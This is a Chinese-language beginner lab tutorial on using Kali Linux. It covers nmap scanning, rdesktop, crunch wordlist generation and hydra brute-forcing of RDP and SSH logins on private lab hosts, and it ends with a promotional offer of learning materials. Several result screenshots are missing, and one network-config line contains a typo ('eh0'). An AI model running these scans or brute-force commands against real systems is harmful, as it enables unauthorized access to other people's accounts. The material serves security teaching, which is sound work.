网络安全零基础教程：Kali Linux如何使用nmap扫描目标主机

一、实验

1.环境

（1）主机

表1 主机

（2）查看Kali Linux (2024.1)系统版本

cat /etc/os-release

（3）查看Kali Linux (2024.1)系统IP地址

ip addr

(4) 查看Windows server 2008 IP 地址

ipconfig

（5）查看Ubuntu 8.04 系统版本及IP地址

lsb_release -a

ip addr

2. Kali Linux (2024.1) 使用 namp 扫描目标主机

(1) 扫描

nmap 192.168.204.150

(2)扫描⽬标主机所有开放的端⼝（TCP半开扫描）

nmap -sS 192.168.204.150

(3)扫描⽬标主机所有开放的端⼝（TCP全开扫描）

nmap -sT 192.168.204.150

(4)扫描⽬标主机系统

nmap -O 192.168.204.150

(5)扫描⽬标主机所在⽹段所有存活的主机

nmap -sP 192.168.204.0/24

(6)扫描⽬标主机所有开放端⼝对应的服务和软件版本

nmap -sV 192.168.204.150

(7)扫描⽬标主机 3389端⼝的开放情况

nmap -sS -p 3389 192.168.204.150

(8)扫描⽬标主机 80和3389端⼝的开放情况

nmap -sS -p 80,3389 192.168.204.150

(9)扫描⽬标主机 20-80 之间的端⼝开放情况

nmap -sS -p 20-80 192.168.204.150

3.Kali Linux (2024.1)远程登录 Windows Server

（1）远程连接Windows Server 2008

rdesktop 192.168.204.150

输入yes

(3) 弹出远程界面

输入账户密码

成功：

4.Kali Linux (2024.1) 使用crunch字典工具

（1）查看自带密码字典

vim /usr/share/wordlists

（2）使用crunch字典工具

1）随机组成6位纯数字密码 crunch 6 6 0123456789 -o test1.txt

2）由Abc1234随机组成的6~8位密码 crunch 6 8 Abc1234 -o test2.txt

3）以A开头后⾯跟3位数字组成的4位密码 crunch 4 4 -t A%%% -o test3.txt

5.Kali Linux (2024.1)使用hydra密码工具

(1) 使用hydra密码工具

hydra -l Administrator -P test4.txt 192.168.204.150 rdp

6.Kali Linux (2022.3) 通过SSH端口获取 Ubuntu 密码

（1）查看Kali Linux (2022.3)系统版本

cat /etc/os-release

（2）查看Kali Linux (2022.3)系统IP地址

ip addr | grep 152

(3) nmap 扫描目标主机

扫描⽬标主机所在⽹段所有存活的主机，发现新增192.168.204.143

nmap -sP 192.168.204.0/24

（2）扫描⽬标主机 22端⼝的开放情况

nmap -sS -p 22 192.168.204.143

（3）使用hydra密码工具

hydra -l msfadmin -P test5.txt 192.168.204.143 ssh

二、问题

1.nmap (Network Mapper 网络探测器) 的命令格式和扫描类型

（1）格式

nmap [扫描类型] [选项] <扫描⽬标>

(2) 指定扫描类型

1）-sS TCP半开扫描（只发SYN包，不会产⽣会话⽇志），速度快 s: scan 扫描 S:SYN 2）-sT TCP全开扫描（尝试全连接），结果更准确 T:TCP 3) -sU UDP扫描 4) -sP 使⽤ICMP扫描，仅⽤于探测⽬标是否在线 5) -O O:OS操作系统 扫描操作系统 6) -sV 扫描端⼝对应的服务版本 V:VERSION 版本

（3）指定目标端口(p: port 端⼝ )

-p 3389 ：扫描指定端⼝ -p 20-80 ：扫描连续的端⼝ -p 22,80 ：扫描多个指定端⼝

（4）端口状态（STATE）

1） open 开放的 2）filtered 探测报⽂被⽬标服务器的防火墙过滤和阻⽌了 3）closed 关闭的

2.crunch有哪些特殊匹配字符

（1）特殊匹配字符

@ --> 代表⼩写字⺟ , --> 代表⼤写字⺟ % --> 代表数字 ^ --> 代表标点及特殊字符

3.hydra的命令格式和选项参数

（1）格式

hydra [选项] ⽬标地址 服务类型

（2）选项参数

1）-l 指定⽤户名 2）-L 指定⽤户名字典⽂件 3）-P 指定密码字典⽂件 4）-o 将结果输出到指定⽂件 5）-v 显示破解过程 6）-t 同时执⾏的任务数，默认16个

4.hydra 密码工具使用失败

（1）报错

（2）原因分析

管理员账户拼写错误。

(3) 解决方法

修改为Administrator

成功：

hydra -l Administrator -P test4.txt 192.168.204.150 rdp

5. Kali Linux(2022.3) 创建动态网卡

(1) 修改网络配置文件

vim /etc/network/interfaces

修改前：

修改后：

auto eth0 iface eh0 inet dhcp

（2）重启网卡

/etc/init.d/networking restart

（3）查看IP

ip addr | grep 152

6.hydra 密码工具使用报错

（1）报错

（2）原因分析

hydra版本过⾼。

(3) 解决方法

使用v9.3版本

成功：

hydra -l msfadmin -P test5.txt 192.168.204.143 ssh

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料，给那些想学习 网络安全的小伙伴们一点帮助！

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

因篇幅有限，仅展示部分资料，朋友们如果有需要全套《网络安全入门+进阶学习资源包》，请看下方扫描即可前往获取